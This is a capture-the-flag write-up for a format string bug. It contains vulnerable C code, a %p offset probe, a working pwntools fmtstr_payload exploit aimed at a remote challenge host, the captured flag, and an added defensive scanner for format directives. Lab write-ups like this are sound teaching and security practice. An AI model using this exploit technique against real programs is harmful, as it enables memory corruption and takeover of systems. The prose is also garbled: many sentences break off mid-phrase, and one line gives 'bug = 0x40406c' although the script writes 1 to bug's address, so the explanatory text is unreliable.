This challenge is about a format string vulnerability. The vulnerable function reads our name and then passes it directly to
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int bug = 0;   /* global the challenge wants us to flip */

void vuln() {
    char name[1024];
    printf("What is your name?\n");
    int number_read = read(STDIN_FILENO, name, sizeof(name) - 1);
    name[number_read - 1] = 0;   /* strip the trailing newline */
    printf("Thank you ");
    printf(name);                /* user input used as the format string */
    printf("!\n");
    if (bug) {
        printf("Oh, you got here somehow, you must have triggered a bug.. Here is the flag: ");
        system("cat /flag");
        exit(0);
    }
    printf("But our flag is in another branch!\n");
}
The bug is this line:
printf(name);
If the program wanted to print our name safely, it should have used:
printf("%s", name);
Because our input is used as the format string,
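As an added illustration (not part of the challenge or the original writeup), here is the hardened form of the greeting next to a small scanner that walks an untrusted string the way printf would and counts the conversion directives in it; a non-zero count on data that is about to reach a printf-style sink is worth logging, and a `%n` is the directive that turns the bug into a write. Function and parameter names are my own.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Hardened greeting: the user-controlled buffer is passed as an
 * argument, never as the format string. */
void greet_safe(const char *name) {
    printf("Thank you %s!\n", name);
}

/* Count printf conversion directives in an untrusted string.
 * "%%" is a literal percent and is not counted.  If has_n is
 * non-NULL it is set to 1 when a "%n" directive is present.
 * This is a detection heuristic for input headed to a printf-style
 * sink, not a replacement for fixing the sink itself. */
int count_format_directives(const char *s, int *has_n) {
    int count = 0;
    if (has_n) *has_n = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        p++;
        if (*p == '%') continue;           /* "%%" -> literal '%' */
        if (*p == '\0') break;             /* trailing lone '%' */
        /* optional positional argument "n$" */
        while (isdigit((unsigned char)*p)) p++;
        if (*p == '$') p++;
        /* flags, width, precision */
        while (*p && strchr("-+ #0", *p)) p++;
        while (isdigit((unsigned char)*p) || *p == '*') p++;
        if (*p == '.') {
            p++;
            while (isdigit((unsigned char)*p) || *p == '*') p++;
        }
        /* length modifiers */
        while (*p && strchr("hlLqjzt", *p)) p++;
        if (*p == '\0') break;             /* incomplete directive */
        count++;
        if (*p == 'n' && has_n) *has_n = 1;
    }
    return count;
}
```

The probe string from this writeup scores 6 directives and no `%n`; a name like "100%% sure" scores 0.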
The goal is to set the global variable
bug = 0x40406c
Before writing to it, we need to know where our controlled data appears in
AAAABBBB.%1$p.%2$p.%3$p.%4$p.%5$p.%6$p
The output contained:
0x4242424241414141
That value is
offset = 6
Pwntools can build the actual
from pwn import *

HOST = "uddmfmafp7egnsbo4q5u3chks7-1024-intro-pwn-2.challenge.cscg.live"
PORT = 443

# local copy of the binary, used only to resolve the address of `bug`
elf = ELF("./intro-pwn-2/intro-fmt")
p = remote(HOST, PORT, ssl=True, sni=HOST)

# offset 6 is where our input starts on the stack (found with the %p probe)
payload = fmtstr_payload(
    6,
    {elf.symbols["bug"]: 1},
    write_size="byte",
)

p.recvuntil(b"What is your name?")
p.sendline(payload)
print(p.recvall(timeout=2).decode(errors="ignore"))
The generated payload places the target address in the input and then uses a
CSCG{f0rm4t_5tr_w1z4rdry_1337}